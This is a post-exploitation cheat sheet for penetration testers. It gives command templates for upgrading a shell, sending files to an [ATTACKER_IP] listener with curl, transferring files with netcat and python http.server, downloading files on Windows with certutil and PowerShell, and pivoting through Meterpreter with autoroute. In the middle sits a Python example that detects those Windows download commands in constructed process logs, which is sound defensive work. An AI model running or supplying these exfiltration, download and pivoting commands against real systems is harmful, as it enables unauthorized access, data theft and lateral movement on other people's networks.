Spawn Better Shell


PYTHON

python3 -c 'import pty; pty.spawn("/bin/bash")';export TERM=xterm
Ctrl + Z
stty raw -echo; fg
Spawn a better shell (tab completion, history, ...).

Extract File from Target


CURL

curl [ATTACKER_IP]:[ATTACKER_PORT] -F 'data=@myFile'
Send myFile to a netcat listener.

Upload File on Target


NETCAT

nc -l -p [TARGET_PORT] > newFile
Run on Target.

nc [TARGET_IP] [TARGET_PORT] < myFile
Run on the attacker machine. Sends myFile to the target.


PYTHON

python3 -m http.server [ATTACKER_PORT]
Run on attacker machine (at the file location).

wget http://[ATTACKER_IP]:[ATTACKER_PORT]/myFile
Get the file on a Linux target machine.

certutil.exe -urlcache -f http://[ATTACKER_IP]:[ATTACKER_PORT]/myFile myFile
or
powershell -c wget "http://[ATTACKER_IP]:[ATTACKER_PORT]/myFile" -outfile "myFile"
or
powershell -c "(new-object System.Net.WebClient).Downloadfile('http://[ATTACKER_IP]:[ATTACKER_PORT]/myFile', 'myFile')"
Get the file on a Windows target machine.
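Seen from the defensive side, the three Windows download one-liners above each leave a distinctive process command line. The following is an added example, not part of the original cheat sheet, that runs simple detection rules over a few constructed process-creation records (the record format and the address 198.51.100.7 are made up for the example); the same patterns apply to command-line fields from Sysmon Event ID 1 or Windows Security event 4688.

```python
import re

# Constructed sample process-creation records (not real telemetry):
# one record per line, "parent_image | image | command_line".
SAMPLE_EVENTS = """\
explorer.exe | notepad.exe | notepad.exe C:\\Users\\bob\\notes.txt
cmd.exe | certutil.exe | certutil.exe -urlcache -f http://198.51.100.7:8000/myFile myFile
cmd.exe | powershell.exe | powershell -c wget "http://198.51.100.7:8000/myFile" -outfile "myFile"
cmd.exe | powershell.exe | powershell -c "(new-object System.Net.WebClient).Downloadfile('http://198.51.100.7:8000/myFile', 'myFile')"
services.exe | certutil.exe | certutil.exe -hashfile C:\\Windows\\System32\\kernel32.dll SHA256
svchost.exe | powershell.exe | powershell -c Get-Date
"""

# Each rule pairs a name with a case-insensitive pattern matched against the command line.
# The benign certutil -hashfile and powershell Get-Date records must not trigger any rule.
RULES = [
    ("certutil_urlcache_download",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\b(https?|ftp)://", re.I)),
    ("powershell_webrequest_outfile",
     re.compile(r"\bpowershell\b.*\b(wget|curl|iwr|invoke-webrequest)\b.*-outfile\b", re.I)),
    ("powershell_webclient_downloadfile",
     re.compile(r"\bpowershell\b.*net\.webclient\b.*\bdownloadfile\b", re.I)),
]

# Pull the fetched URL out of the command line for the alert; stops at quotes, parens or spaces.
URL_RE = re.compile(r"(?:https?|ftp)://[^\s'\")]+", re.I)


def parse_event(line):
    """Split one 'parent | image | command_line' record; returns None for blank or malformed lines."""
    parts = [p.strip() for p in line.split("|", 2)]
    if len(parts) != 3 or not parts[2]:
        return None
    return {"parent": parts[0], "image": parts[1], "cmdline": parts[2]}


def match_rules(event):
    """Return the names of all rules whose pattern matches the event's command line."""
    return [name for name, pattern in RULES if pattern.search(event["cmdline"])]


def detect(log_text):
    """Run every rule over a block of records; emits one alert per (event, rule) pair."""
    alerts = []
    for line in log_text.splitlines():
        event = parse_event(line)
        if event is None:
            continue
        for rule in match_rules(event):
            url = URL_RE.search(event["cmdline"])
            alerts.append({
                "rule": rule,
                "parent": event["parent"],
                "image": event["image"],
                "url": url.group(0) if url else None,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] {alert['parent']} -> {alert['image']} fetched {alert['url']}")
```

Running the block prints three alerts, one per download technique, and stays silent on the two benign records. In a real pipeline the parent image (cmd.exe spawning certutil.exe or powershell.exe) and the destination host are the fields worth correlating next.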


MIMIKATZ


METERPRETER

upload
Upload a file or directory.

download
Download a file or directory.

Pivoting


METERPRETER

When we have a meterpreter shell on a machine that has access to another network, we can use it to gain access to that second network.

run autoroute -s [REMOTE_NETWORK]/24
Add a route to the remote network through the host we already have access to.

run autoroute -p
Show added routes.